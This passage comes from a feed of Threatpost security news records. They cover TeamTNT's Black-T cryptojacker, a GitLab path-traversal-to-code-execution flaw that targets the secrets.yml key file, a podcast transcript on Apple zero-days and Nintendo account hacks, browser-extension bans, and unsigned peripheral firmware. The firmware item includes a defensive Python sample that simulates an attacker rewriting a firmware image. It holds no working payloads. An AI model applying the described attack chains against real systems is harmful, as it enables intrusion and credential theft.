Quist, senior threat researcher for Unit 42, said. 
\u201cIn the past, attacker groups like [Rocke](<https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/>) and [Pacha](<https://www.paloaltonetworks.com/resources/research/digital-executive-summary-unit-42-cloud-threat-report-spring-2020>) would battle for resources. TeamTNT is battling with Kinsing malware and Crux worm today. I believe that this battle for resources will increase and attacker groups will look for other opportunities to use cloud resources. We can see this now with TeamTNT collecting passwords and AWS credentials in an attempt to expand and maintain a cloud presence.\u201d\n\nAfter it eliminates the competition, Black-T installs masscan, libpcap to listen to various resources on the network, including pnscan, zgrab, Docker and jq (the latter is a flexible command-line JSON processor, according to Unit 42).\n\n\u201cTeamTNT is investing more resources into scanning operations, likely with the intent to identify and compromise more cloud systems,\u201d Quist added. \u201cZmap is a known open-source scanning solution and with the creation of zgrab, a GoLang tool written for zmap, it is attempting to capitalize on the added benefits of the Go programming language, such as speed and performance increases. It is likely that TeamTNT actors are attempting to refine their scanning capabilities to make them faster, more accurate and less resource-intensive.\u201d\n\nNext, Black-T fetches various downloads: Beta to create a new directory; the mimipy and mimipenquin password scraping tools; and the XMR mining software called bd.\n\n\u201cThe inclusion of memory password-scraping tools should be considered an evolution of tactics,\u201d Quist said. \u201cTeamTNT has already integrated the collection and exfiltration of AWS credentials from compromised cloud systems, which provides post-exploitation capabilities. 
By adding memory password-scraping capabilities, TeamTNT actors are increasing their chances in gaining persistence within cloud environments.\u201d\n\nThe use of [worms](<https://threatpost.com/worm-golang-malware-windows-payloads/156924/>) like masscan or pnscan by TeamTNT isn\u2019t new, but Unit 42 noticed Black-T adds a new scanning port. Researchers wonder whether this signals the group has figured out how to target Android devices as well.\n\nAs remote work and cost savings continue to drive computing to the cloud, more groups like TeamTNT are sure to emerge ready to take advantage, according to Quist. Admins should take steps to ensure that [Docker](<https://threatpost.com/doki-backdoor-docker-servers-cloud/157871/>) and daemon APIs, as well as any other sensitive network services, aren\u2019t exposed, so that the cloud can be protected from the next evolution of cloud cryptojackers, he added.\n", "cvss3": {}, "published": "2020-10-05T19:47:05", "type": "threatpost", "title": "Black-T Malware Emerges From Cryptojacker Group TeamTNT", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-10-05T19:47:05", "id": "THREATPOST:D4F89B42660582EFECA648A891470AD4", "href": "https://threatpost.com/blackt-cryptojacker-teamtnt/159853/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:25:55", "description": "A critical GitLab vulnerability, which could be leveraged by a remote attacker to execute code, recently netted a researcher a $20,000 bug-bounty award.\n\nThe flaw was reported to GitLab by software developer [William Bowling](<https://twitter.com/wcbowling>) via the [HackerOne bug bounty platform](<https://hackerone.com/reports/827052>) on March 23. It was then disclosed this week after being patched in GitLab version 12.9.1.\n\nAt issue is a path-traversal flaw in GitLab, which started out as a web-based Git repository manager but has moved into the DevOps lifecycle-management space. A path traversal is a web security flaw that allows an attacker to read arbitrary files on the server that is running an application. For this particular flaw, the ability to read arbitrary files on the server would give attackers access to tokens, private data, configs and more.\n\nSpecifically the flaw exists in the UploadsRewriter function of GitLab, which is used to duplicate files. The UploadsRewriter does not validate the file name and path, allowing arbitrary files to be copied without restriction when moving issues to a new project.\n\n\u201cAs there is no restriction on what file can be, path traversal can be used to copy any file,\u201d said Bowling in his bug-bounty report. 
\u201cThe file or path should be validated before copying files.\u201d\n\nBowling then took the flaw a step further, showcasing how it could be leveraged to launch a remote code-execution attack. Once the arbitrary-file-read flaw is exploited, he said, it can be used to grab the secret_key_base from the /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml file.\n\nThe secret_key_base is used to derive the keys that generate and verify encrypted or signed cookies. Once attackers hold the secret_key_base, they could craft cookies the server would trust and use them to execute code.\n\nGitLab verified the finding and escalated the issue to its engineering team, granting Bowling an initial $1,000 triage payment for his findings before ultimately granting the $20,000.\n\nGitLab in December [announced it had awarded a total of $565,650](<https://threatpost.com/gitlab-doles-out-half-a-million-bucks-to-white-hats/151138/>) in security bug bounties to 171 researchers who reported valid vulnerabilities in the past year. GitLab launched its [bug-bounty program](<https://hackerone.com/gitlab>) in 2018, and according to Juan Broullon, senior application security engineer at the company, it received a total of 1,378 reports from 513 white-hat hackers in that time.\n", "cvss3": {}, "published": "2020-04-29T16:39:56", "type": "threatpost", "title": "Critical GitLab Flaw Earns Bounty Hunter $20K", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-04-29T16:39:56", "id": "THREATPOST:C249ACD6B53EBF0A2F149F42F6D9873D", "href": "https://threatpost.com/critical-gitlab-flaw-bounty-20k/155295/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:26:07", "description": "For the week ended April 24, Threatpost editors discuss the hottest cybersecurity news stories, including:\n\n * Apple [zero days disclosed](<https://threatpost.com/apple-patches-two-ios-zero-days-abused-for-years/155042/>) in the iPhone iOS that researchers say have been exploited for years. 
Meanwhile, [Apple has pushed back](<https://threatpost.com/apple-pushes-back-against-zero-day-exploit-claims/155108/>) and said there\u2019s no evidence to support such activity.\n * Nintendo [confirming that](<https://threatpost.com/nintendo-confirms-breach-of-160000-accounts/155110/>) over 160,000 accounts have been hacked, due to attackers abusing a legacy login system (NNID).\n * With the [NFL\u2019s virtual draft](<https://threatpost.com/nfl-tackles-cybersecurity-2020-draft-day/155004/>) kicking off this week, security researchers and teams have been sounding off on security issues leading to data theft or denial of service attacks.\n\n[Download direct here](<http://traffic.libsyn.com/digitalunderground/news_wrap_apr_24_3.mp3>), or listen to the podcast below.\n\n_Below find a lightly edited transcript of the Threatpost news wrap._\n\n**Lindsey O\u2019Donnell-Welch**: Hello everyone, welcome back to the [Threatpost news wrap](<https://threatpost.com/category/podcasts/>). You\u2019ve got the Threatpost team here today to discuss this week\u2019s top cyber security news, including myself, Lindsey O\u2019Donnell-Welch and Threatpost editors Tom Spring and Tara Seals. Tom and Tara, happy Friday.\n\n**Tom Spring**: Hey!\n\n**Tara Seals:** Hey, Lindsey. How are you?\n\n**Lindsey:** Good. There\u2019s been a lot of news from this week that we need to unpack. We\u2019ve had leaked source code, Apple zero days, security issues around the NFL draft. 
So, Tom, I mean, starting with the Apple zero days, that was kind of a huge news item of the week, and there was some back and forth, and I think the most recent thing, was Apple having a statement come out today about the zero days. Can you kind of give us a sense of what that was all about?\n\n**Tom:** Well, sure, sure. It\u2019s an evolving story. And it started a couple days ago when a number of researchers and I\u2019m probably gonna mispronounce the name of the security firm, ZecOps or something along those lines -I can never pronounce these names \u2013 But anyways, they found two zero days, or what they claimed are two zero days that are very, very troubling when described. An attacker can send an email to an iOS device. And if Apple\u2019s default mail program receives that message, there are two vulnerabilities \u2013 an out of bounds write vulnerability and a heap overflow bug \u2013 that kick in when this specially crafted message arrives. In very simple terms, the bugs impact the way that the mail program processes memory. And I won\u2019t get into the technical aspects of it, we\u2019ve written about it, it\u2019s on Threatpost. But essentially, the hackers can use this to either extract data from the mailbox itself, and or combine the flaw to actually take over the device or take control of the device. This was something that was very shocking considering that any modern patched version of the iOS was vulnerable to this attack. The researchers said that this is an attack that\u2019s been used in the wild in a number of targeted attacks by some APTs. And so that story goes. Apple did release a beta update to iOS. And it was reported a couple days ago. And it seemed to suggest Apple was kind of quiet at the time. But given that Apple had released a beta version of its iOS, it seemed that Apple was was not explicitly stating that there was a problem, but suggested it by sending out a patch. 
Now today, Apple is downplaying the impact of the bug and saying that it has found no evidence that that the bug, number one, has been used in the wild. And just to briefly, quote, Apple\u2019s statement released I believe was yesterday: \u201cWe have concluded these issues do not pose an immediate risk to our users. The researchers identified three issues in mail, but alone, they are insufficient to bypass iPhone or iPad protections. And we have found no evidence they were used against customers.\u201d So we have the classic he said, she said, and we\u2019ll see how this plays out. But it\u2019s high drama, once again with zero days, zero day claims and zero day denials.\n\n**Lindsey:** Yeah, it definitely seems like it is turning into kind of a he said-she said type of report. And it\u2019s interesting too, you know, just looking at ZecOp\u2019s report, they did kind of go into deep detail about the flaws being exploited in the wild. And I think they had mentioned that there were a number of different targets, including individuals from a Fortune 500 org in North America, and executives from a Japanese based carrier. So it is just kind of interesting that Apple is pushing about back against those specific claims that the bugs have been exploited for years. And I\u2019m curious to see kind of where this goes and whether the researchers respond back to Apple at all, and, you know, further kind of corroborate what they had written in the report.\n\n**Tom:** Yeah, well, you know, Apple has gotten some support from the research community. I believe that Google\u2019s Project Zero researchers have chimed in expressing some doubt on the ZecOps research. Meanwhile if anybody\u2019s worried there is the beta version of the iOS that you can download right now and I\u2019m sure we\u2019re going to be hearing more from Apple about them pushing out an update, a final update, for the iOS as well. 
But you know, I mean, I mean here again, you have Apple which is tight lipped won\u2019t comment and I mean, they have to put out a statement days after the the researchers come out with their their findings. From a reporter standpoint, it would be so nice [if Apple would open up a bigger dialogue](<https://threatpost.com/apple-upgrades-bug-bounty-program-adds-macs-1m-reward/147146/>), not only with journalists, but especially with researchers in terms of maybe helping them better understand what they found, the original research really, casted no doubt on their own research. I mean, why would they, but at least, you know, they could have tempered some of their research with some feedback from Apple. I\u2019m not too sure if they purposely left it out. But you know, historically speaking, it\u2019s tough for researchers to get to vendors to give a [full throated response to their research](<https://threatpost.com/google-bug-hunter-urges-apple-to-change-its-ios-security-culture/134842/>), but we shall be following this story. I\u2019m sure we might even see some interesting things happen over the weekend and Monday morning. We\u2019ll be watching carefully.\n\n**Tara**: I have a question Tom. Have there been any third party researchers that have taken a look at this and weighed in at all with an opinion?\n\n**Tom:** Well, Google Project Zero did. And they cast some doubt on the research itself. I\u2019m not aware of anybody else, I\u2019ve heard a lot of researchers comment on the zero days, but they were commenting in reaction to the actual research being released, they weren\u2019t commenting on, their own reverse engineering, the proof of concepts and dissecting the research itself. So, you know, there could be a lot more noise going out there. And again, this is a fast moving story, and it\u2019s evolving quickly. 
And we will be keeping a close eye on the Twittersphere of reliable researchers and reaching out to a lot of people on the phone, and hopefully we’ll have a good solid update either over the weekend or ASAP to better assess the real threat here with these “zero days.”

**Lindsey:** Right. Well, that was definitely one of the bigger stories of this week. And actually another big story, I guess two similar stories, kind of revolved around the gaming community. And one of those stories was Nintendo today coming out and confirming that 160,000 accounts have been hacked.

**Tom:** Yeah, Lindsey, which Nintendo accounts? Do we know? I mean, I’m just thinking about my son’s different accounts with Nintendo. Do we know what platform or services may have been impacted?

**Lindsey:** Yeah, so, basically over the past few weeks, gamers who are using the Nintendo Switch were reporting suspicious activities on their accounts. And they were basically going on Twitter, and there were different posts on Reddit, saying that unauthorized actors had been logging into their accounts using their PayPal or their payment card methods that were connected to the accounts and buying digital currency for, like, online in-game systems. So like [Fortnite V-Bucks](<https://threatpost.com/fortnite-ransomware-masquerades-as-an-aimbot-game-hack/147549/>), etc., etc. This was reported over the past few weeks by various outlets, but Nintendo had stayed kind of silent about whether this was actually happening or what was behind this. And finally, in a statement today, it first of all confirmed the attacks, it said that specifically 160,000 accounts were hacked, and it said the reason that this hack was occurring was because attackers were abusing the Nintendo Network ID legacy login system, which I don’t know if you guys remember, but that was from the Nintendo 3DS and Wii U consoles.
That was what was primarily used to log in and to buy digital currency for those accounts. So anyways, Nintendo was saying that this login ID was being linked to various Nintendo accounts for the Switch. And somehow attackers were able to access the accounts tied to this legacy login system and were then able to access the linked Nintendo accounts for the Switch. And from there, they’d have access to the different payment methods, and were able to make the in-game purchases. So Nintendo didn’t provide any further details about how these accounts were specifically being accessed. But they did say that they were being obtained by some means other than their own service. So I know there had been theories about, like, credential stuffing or otherwise, but that doesn’t seem like it was the case here. So it’s now disabled the NNID login service so that you can’t use that anymore.

**Tom:** Well, I’ll hear from my son if he’s had trouble connecting, and I’ll know what’s going on.

**Lindsey:** Yeah, yeah, I would check in and make sure.

**Tom:** I wrote a [story about Linksys, they had to reset their passwords](<https://threatpost.com/attacks-on-linksys-routers-trigger-mass-password-reset/154914/>). And I’m a Linksys customer. And they assured me that every single Linksys customer had been notified. And then I was like, “Well, hold on a minute. I’m a Linksys customer, I haven’t been notified.” And they backtracked and said, “well, we’re doing it in waves.” So I take it with a grain of salt when a lot of these companies say they’ve implemented a fix – whether or not that fix is immediate or whether it phases in over time.
So I’ll be interested to hear whether my son’s actually having issues or not, or whether they’ve reset passwords or whatnot.

**Lindsey:** Yeah, well, it seems like a lot of companies can post the statement onto their Twitter accounts or on their website and think that’s enough. But you’d be surprised at the number of people who actually need the email notification to be notified of these hacks. So, but it did advise players to set up two-factor authentication, of course, to add that extra layer of security to accounts. And it is also resetting the passwords for affected accounts. So hopefully, this problem will go away. I know it had been a widespread kind of issue for people who had been reporting about it online. So we’ll see.

That was one of the news items related to gaming. The other one was the [discovery of leaked source code this week](<https://threatpost.com/valve-confirms-csgo-team-fortress-2-source-code-leak/155092/>) for two popular games that were published by Valve. Those were Counter-Strike: Global Offensive and Team Fortress 2. And basically, that was a whole issue because the source code, if accessed, could lead to security issues or cheating, which probably isn’t as serious, but you know, it’s still a problem. And Valve, the developer and publisher of the two games, came out and basically said that the source code in question dates back to 2017 and was already part of an existing leak from 2018. But anyways, I think that goes to show that these security issues do continue to pop up in the gaming space.
And there’s such, like, a massive install base for gamers that this is just a [really lucrative area for cybercriminals](<https://threatpost.com/researcher-discloses-second-steam-zero-day-after-valve-bug-bounty-ban/147593/>) to be looking at.

**Tara:** Yeah, I definitely think that’s the point I was going to make, is that, I think, Nintendo has 20 million active users or something like that. And these massive multiplayer games have millions of users too, in some cases, and so, you know, I’m surprised we don’t care more about gamer hacking stuff, to be honest.

**Lindsey:** Yeah, definitely. I definitely agree, Tara. And so, and then Tara, you also had a very timely news story about the NFL Draft, which is virtual this year, and kind of the security concerns that researchers and also teams were having with the event as it starts this week. What were kind of the top concerns there?

**Tara:** Yeah, so the NFL Draft, obviously, is a massive, massive event for the league every single year. This is, for the sliver of the population that doesn’t know about it, it’s basically where you have pro teams that are looking at the people that are coming out of college and, you know, the Canadian league and some other places that, you know, have not been signed to the pros yet, and they evaluate their stats and everything, and then this is their opportunity to find new people for the roster. And so in the past this has been done in sort of public space, and everybody kind of gets together, and teams will congregate at their stadiums and war rooms and things like that. That’s not possible. And so everybody is basically trying to do this with one-to-one links, you know, from their houses.
So you have a head coach in his house or her house, and then you have, you know, the GM in their house, and then obviously all the players trying to tune in, the prospective players that is, and so if you look at the communications footprint here, the distributed communications footprint is pretty massive. And so in order to bring everybody together to make this happen, there’s a couple of different platforms to do that; one was Microsoft Teams, and then there’s Zoom, you know, infamous Zoom, which clubs are using to communicate amongst themselves.

**Lindsey:** The security issues here are really something that’s good to be looking at right now, with something as big as this, and it’s something that we’ll also have to probably continue looking at for the foreseeable future. But I also think kind of the technical logistics in the background are important too. And I saw on Twitter yesterday there was, like, this [picture of Belichick looking at the draft from his house](<https://twitter.com/jeffphowe/status/1253504449244512257>) in Nantucket, and a bunch of people were laughing about the fact that, questioning how he was able to get Wi-Fi on Nantucket, and whether it was able to hold up, and all these things. So I think it’s just so new that there’s a lot of, like, questions and technical concerns there too.

**Tara:** Yeah, it’s kind of interesting, because there are 100+ video feeds when you take into account, you know, all the general managers, all the prospects, which there are 58 different prospects, and the coaches themselves, and then plus that’s not even including, you know, the individual underlings that are involved in the process. But yeah, the Belichick thing was really funny.
And then also the [head coach of the Arizona Cardinals was all over Twitter](<https://twitter.com/nfldraftscout/status/1253478908487503873>), it went totally viral yesterday, he has this sort of Bond villain lair in the Phoenix mountains vibe. It was all like gleaming white, and like he’s wearing, you know, Italian loafers. And he just looks like an Armani ad or something. I mean, there’s a lot of cultural fun stuff that goes along with this. But there’s also a lot of, you know, legitimate cybersecurity concerns. And so, with the draft picks, you know, you wouldn’t think of that as being sort of critical information, but it really is. And you consider that if a team’s draft strategy is leaked to another team, then that’s obviously competitive, and that can destroy a team’s season, in theory. You also have, if these things are able to be intercepted, then it can be very useful for people in the online gambling world; for example, there’s a lot of fraud that can be carried out with that. And so there are a few different things that can be done if draft information falls into the wrong hands. And so that’s really what they were concerned about. I did reach out to the NFL to find out what their take was on cybersecurity, and they wouldn’t reveal what exactly they’ve done. But they did say that they are aware of the potential dangers, and I mean, the draft is going to continue through tomorrow. So, you know, it remains to be seen if they successfully warded off any attacks or not.

**Lindsey:** Right, I was about to ask if there have been any incidents so far, but I’m sure that remains to be seen at this point.
But yeah, I think that, you know, obviously the data itself, in terms of team strategy and personnel plans, is a big issue. And also I feel like denial of service could be an issue here too. And, you know, launching a denial-of-service attack or even kicking people off.

**Tara:** Yeah, I’m so glad that you said that, actually. Because that is one thing that one of the security researchers that I talked to had mentioned, was the denial-of-service aspect of this, obviously. So anybody who plays fantasy football is familiar with this, but you get a very short window of time to make your draft pick, and it’s kind of a snooze-you-lose; if you don’t do it in that time period, then you get passed over and you don’t get to go back and redo it. So, you know, conceivably, an attacker could DDoS someone, you know, a club, and prevent them from making their draft pick, and there would be no way for them to go back and remediate that, really. So again, these are things that can make a pretty radical difference when it comes to the team’s future. And of course, this is assuming that we’re going to have an NFL season this year.

**Lindsey:** We’ll see. Fingers crossed. I really like that story. It’s a fun and applicable story. And, you know, I put it on Facebook and someone posted, “you know [the NFL has] been hacked when the first person picked is Terry Bradshaw.” All right. Well, on that note, it’s been a very busy week in the infosec world, and there’s much more that needs to be covered. So let’s wrap up the podcast here. Tom and Tara, thanks for coming on today.

**Tom:** Yeah, thank you.

**Tara:** Thanks, Lindsey. You guys have a good weekend.

**Lindsey:** You too. And to all our listeners, thank you for joining us today. If you like what you’ve heard here, be sure to share this episode on social media.
And if you have any comments or thoughts regarding Apple zero days, or any of the news stories that we’ve talked about today, please [reach out to us on Twitter at @Threatpost](<https://twitter.com/threatpost>) and let’s keep the conversation going. If not, catch us next week on the Threatpost podcast.

_**Also, check out our [podcast microsite](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>), where we go beyond the headlines on the latest news.**_

", "cvss3": {}, "published": "2020-04-24T17:11:16", "type": "threatpost", "title": "News Wrap: Nintendo Account Hacks, Apple Zero Days, NFL Security", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-04-24T17:11:16", "id": "THREATPOST:CAAA6F4ECA9D8F91250F10C27A869E23", "href": "https://threatpost.com/news-wrap-nintendo-account-hacks-apple-zero-days-nfl-security/155122/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:25:35", "description": "

UPDATE

Both the Google Chrome and Mozilla Firefox teams are cracking down on web browser extensions that steal user data and execute remote code, among other bad actions.

Browser extensions are add-ons that users can install to enhance their web surfing experience – they offer the ability to do everything from setting a special search wallpaper to displaying continuous weather data to language translation. This group also includes things such as ad blockers and security scanning.

While extensions are useful, they can also introduce danger.
In addition to [intentionally malicious](<https://threatpost.com/malicious-browser-add-guides-victims-phishing-sites-112912/77262/>) browser extensions that compromise users, legitimate offerings are also common targets for cybercriminals who [look to exploit vulnerabilities](<https://threatpost.com/cisco-webex-browser-bug/143285/>) in their code.

## Google Bans Paid Extensions

In this case, Google said that after becoming aware of a widespread pattern of pernicious behavior on the part of a large number of Chrome extensions, it has disabled publishing of extensions that contain a monetary component – those that are paid for, offer in-browser transactions and those that offer subscription services. It’s a temporary measure, according to the internet giant – but one that doesn’t yet have a timeline for resolution.

“Earlier this month the Chrome Web Store team detected a significant increase in the number of fraudulent transactions involving paid Chrome extensions that aim to exploit users,” it [said in a notice](<https://groups.google.com/a/chromium.org/forum/#!topic/chromium-extensions/EW0VuDjZSO4>), issued Friday. “Due to the scale of this abuse, we have temporarily disabled publishing paid items. This is a temporary measure meant to stem this influx as we look for long-term solutions to address the broader pattern of abuse.”

[Chart: Top 5 Paid Chrome Extensions](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/01/27133106/google-paid-extensions.png>)

The notice added, “We are working to resolve this as quickly as possible, but we do not have a resolution timeline at the moment. Apologies for the inconvenience.”

Rejections will carry a “Spam and Placement in the Store” tag, the Google team told developers. Rejections can be appealed and will be reviewed, it noted.

The impact could be minimal.
According to [data from Extension Monitor](<https://extensionmonitor.com/blog/breaking-down-the-chrome-web-store-part-1>) published mid-2019, there are about 188,000 extensions in the Chrome Web Store, out of which only about 9 percent (16,718) fall into the paid category. Paid add-ons also account for less than 2.6 percent of the more than 1 billion total extension installs logged in the research. The top five paid extensions make up about half (48.5 percent) of that number, with IE Tab dominating at 4.1 million installs (31.5 percent). About 35 percent of paid extensions (5,885) don’t have any users at all.

_**Updated 9:30 a.m. ET on Jan. 28: Threatpost has reached out to Google for clarification on whether existing paid extensions have been taken down, or if the policy applies only to updates and new submissions.**_

## Mozilla Cleans House

Mozilla, meanwhile, has taken a more case-by-case tack, disabling 197 Firefox add-ons in total for a range of improper activity, as first [reported by ZDNet](<https://www.zdnet.com/article/mozilla-has-banned-nearly-200-malicious-firefox-add-ons-over-the-last-two-weeks/>). This includes remote code execution and harvesting user data. The add-ons have not only been removed from the official Mozilla Add-ons (AMO) portal, but have been disabled in the browsers of existing installs.

The disabled add-ons include a whopping 129 extensions from 2Ring, which offers extensions and add-ons that provide business-to-business functionality for unified communications and contact centers. It’s a Cisco Preferred Partner, and it [says on its website](<https://www.2ring.com/products/>) that it has “a roadmap aligned with Cisco’s collaboration portfolio and with solutions that their system engineers can deploy repeatedly and support with ease.”

Threatpost reached out to 2Ring for comment.
Meanwhile, “I’ve reviewed the add-ons and confirmed they are executing remote code,” according to the bug tracker on the issue.

That’s not to say the extensions were intentionally malicious. Mozilla’s policy is that extensions that fetch and execute code from a remote server, legitimate or otherwise, are in violation of its add-on rules, which the default extension [content security policy](<https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/Content_Security_Policy>) is meant to enforce by allowing scripts only from the extension package itself.

The blocked extensions uncovered by ZDNet also include [six add-ons](<https://bugzilla.mozilla.org/show_bug.cgi?id=1609718>) deemed to be executing remote code, which were developed by Tamo Junto Caixa. [Tamo Junto](<https://aliancaempreendedora.org.br/tamojunto/faq/>) is a banking entity that offers Brazilian microentrepreneurs online courses, video classes, articles and management tools.

Other browser extensions, like Rolimons Plus (an extension linked to the Roblox online multiplayer video game), [were blocked](<https://bugzilla.mozilla.org/show_bug.cgi?id=1608432>) for “collecting ancillary user data against our policies,” while others (unnamed in the bug ticket) [were banned](<https://bugzilla.mozilla.org/show_bug.cgi?id=1610462>) for “showing malicious behavior on third-party websites.” Still others, including [three unnamed add-ons](<https://bugzilla.mozilla.org/show_bug.cgi?id=1610456>), were determined to be “fake premium products.”

As with Google Chrome, Mozilla developers are able to appeal the bans.

At least one researcher said that the actions are likely the fruit of heightened concerns and regulations around privacy, including the California Consumer Privacy Act (CCPA).

“In the [post-CCPA/GDPR world](<https://threatpost.com/californias-tough-new-privacy-law-and-its-biggest-challenges/151682/>), tech companies are paying greater attention to the risks that software poses to users,” said Mike Bittner, associate director of Digital
Security and Operations for The Media Trust, via email. “Much of the risk stems from having no control over what impact code will have on the security and privacy of user personal data. Until tech companies know who’s running what code in the various components that make up extensions and other forms of software, the risk of fraud and theft will remain high, as will the risk of running afoul of these new privacy laws.”

", "cvss3": {}, "published": "2020-01-27T21:26:55", "type": "threatpost", "title": "Google, Mozilla Ban Hundreds of Browser Extensions in Chrome, Firefox", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-01-27T21:26:55", "id": "THREATPOST:6F4D076CD2B99D42353A5547FDBB288C", "href": "https://threatpost.com/google-mozilla-ban-browser-extensions-chrome-firefox/152257/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:30:12", "description": "

Fresh firmware vulnerabilities in Wi-Fi adapters, USB hubs, trackpads and cameras are putting millions of peripheral devices in danger of a range of cyberattacks, according to research from Eclypsium.

TouchPad and TrackPoint firmware in Lenovo laptops, HP Wide Vision FHD camera firmware in HP laptops and the Wi-Fi adapter on Dell XPS laptops were all found to lack secure firmware update mechanisms with proper code signing.

“Software and network vulnerabilities are often the more-obvious focus of organizations’ security priorities, but firmware vulnerabilities could give adversaries full control over the compromised device,” Katie Teitler, senior analyst at TAG Cyber, said via email. “This could lead to implanted backdoors, network traffic sniffing, data exfiltration and more.
Unfortunately, though, firmware vulnerabilities can be harder to detect and more difficult to patch.”

## Unsigned Firmware Updates: A Growing Problem

Firmware for peripherals can be burned into the integrated circuit of the device itself, or the component may have its own flash memory where firmware is stored. Firmware can also be dynamically provided by the operating system at boot time. Regardless of the implementation approach, firmware is used as the device-specific operating system for the peripheral in question, and can provide criminals with a rich attack surface if found to be vulnerable.

“Many peripheral devices do not verify that firmware is properly signed with a high-quality public/private key before running the code,” explained researchers at Eclypsium, in vulnerability research [released on Tuesday](<https://eclypsium.com/2020/2/18/unsigned-peripheral-firmware/>). “This means that these components have no way to validate that the firmware loaded by the device is authentic and should be trusted. An attacker could simply insert a malicious or vulnerable firmware image, which the component would blindly trust and run.”

The scenario for an attack is thus a simple one. First, an attacker gains access to a device by any method – physical access, malware that allows remote code execution, and so on. Then, with basic user privileges, the attacker writes malicious firmware to a vulnerable component. If the component doesn’t require the firmware to be properly signed, the attacker’s code is loaded. Depending on the peripheral in question, this can lead to a range of malicious activity.

“For example, malicious firmware on a network adapter could allow an attacker to sniff, copy, redirect or alter traffic leading to a loss of data, man-in-the-middle and other attacks,” according to the research.
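The attack scenario above, as an added example that is not part of Eclypsium’s research or of any vendor’s updater: a minimal firmware image container whose update path is checked two ways, first with only a digest (which is all an unsigned update path amounts to) and then with an authenticator the host-side attacker cannot recompute. The container layout, the vendor key and the use of HMAC-SHA256 in place of the RSA/ECDSA signature a real component would verify against a public key burned into the part are all assumptions of this example; the property shown holds either way: an attacker with ordinary user privileges on the host can rewrite the payload and recompute the digest, but cannot forge the tag.

```python
"""Firmware image acceptance: integrity-only check vs. authenticated check.

Added example, not Eclypsium's tooling or any vendor's updater. The
container layout, VENDOR_KEY and the use of HMAC-SHA256 in place of the
RSA/ECDSA signature a real component would verify with a burned-in public
key are assumptions of this example.
"""
import hashlib
import hmac
import struct

MAGIC = b"FWIM"
HEADER = struct.Struct(">4sI32s32s")  # magic, payload length, sha256, tag

# Assumption: the vendor's signing key. With a real signature only the
# public half lives in the component; what matters is that the host-side
# attacker holds neither.
VENDOR_KEY = b"vendor-signing-key-for-this-example-only"


def build_image(payload: bytes, key: bytes = VENDOR_KEY) -> bytes:
    """Vendor build step: digest the payload, authenticate the digest."""
    digest = hashlib.sha256(payload).digest()
    tag = hmac.new(key, digest, hashlib.sha256).digest()
    return HEADER.pack(MAGIC, len(payload), digest, tag) + payload


def parse_image(image: bytes):
    """Split an image into (digest, tag, payload), rejecting malformed input."""
    if len(image) < HEADER.size:
        raise ValueError("truncated header")
    magic, length, digest, tag = HEADER.unpack_from(image)
    if magic != MAGIC:
        raise ValueError("bad magic")
    payload = image[HEADER.size:]
    if len(payload) != length:
        raise ValueError("length mismatch")
    return digest, tag, payload


def accept_integrity_only(image: bytes) -> bool:
    """What an unsigned update path amounts to: a digest guards against
    corruption in transit, not against whoever wrote the file."""
    digest, _tag, payload = parse_image(image)
    return hmac.compare_digest(digest, hashlib.sha256(payload).digest())


def accept_authenticated(image: bytes, key: bytes = VENDOR_KEY) -> bool:
    """The check the component itself should perform before writing flash."""
    digest, tag, payload = parse_image(image)
    if not hmac.compare_digest(digest, hashlib.sha256(payload).digest()):
        return False
    expected = hmac.new(key, digest, hashlib.sha256).digest()
    return hmac.compare_digest(tag, expected)


def attacker_rewrite(image: bytes, new_payload: bytes) -> bytes:
    """Host-side attacker with ordinary user privileges: swap the payload
    and recompute the digest (no secret needed); the tag is carried over."""
    _digest, tag, _payload = parse_image(image)
    new_digest = hashlib.sha256(new_payload).digest()
    return HEADER.pack(MAGIC, len(new_payload), new_digest, tag) + new_payload


if __name__ == "__main__":
    good = build_image(b"touchpad firmware v1.0 (constructed)")
    evil = attacker_rewrite(good, b"touchpad firmware with implant (constructed)")
    print("vendor image:    integrity", accept_integrity_only(good),
          " authenticated", accept_authenticated(good))
    print("rewritten image: integrity", accept_integrity_only(evil),
          " authenticated", accept_authenticated(evil))
```

The place this check runs matters as much as the check itself: a verifier in a host-side update tool (the HP updater described below is one) can be patched or bypassed by the same attacker who can write the image, so the component should hold the vendor’s public key in ROM or OTP, verify before committing anything to flash, and refuse to roll back to an older signed image that carries a known bug.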
“PCI-based devices could enable [Direct Memory Access (DMA) attacks](<https://threatpost.com/dell-hp-memory-access-bugskernel-privileges/152369/>) that could easily steal data or take full control over the victim system,” the report continued. “Cameras could be used to capture data from the user’s environment, while a compromised hard drive could allow the attacker to hide code and tools without being seen by the operating system.”

Further, firmware attacks allow malicious activity to fly under the radar of endpoint protections; as recently seen in the [latest campaigns using the RobbinHood ransomware](<https://threatpost.com/byo-bug-windows-kernel-outdated-driver/152762/>), vulnerable drivers can be used to bypass security protections and enable ransomware to attack without interference.

Jesse Michael, principal researcher at Eclypsium, told Threatpost that the kinds of attacks that these bugs enable are not insignificant. For instance, the BlackEnergy attack that brought down part of the power grid in Ukraine used an unsigned firmware update to break serial-to-Ethernet adapters that were used to control relays.

“A similar incident occurred with Saudi Aramco,” he said. “This made the system much harder to bring back online.” He added that there has been a 7.5x increase in firmware/hardware CVEs compared with three years ago.

## New Vulnerabilities

Eclypsium researchers analyzed a Lenovo ThinkPad X1 Carbon 6th Gen laptop, which contains two vulnerable firmware mechanisms: Touchpad firmware (pr2812761-tm3288-011-0808.img) and TrackPoint firmware (PSG5E5_RANKA_fv06.bin).

“We discovered that the Touchpad and TrackPoint use insecure firmware update mechanisms,” according to the research. “Specifically, cryptographic signature verification was not required at the device level before firmware updates were applied.
This lack of control made it possible to modify the firmware images through software to run arbitrary malicious code within these components.”

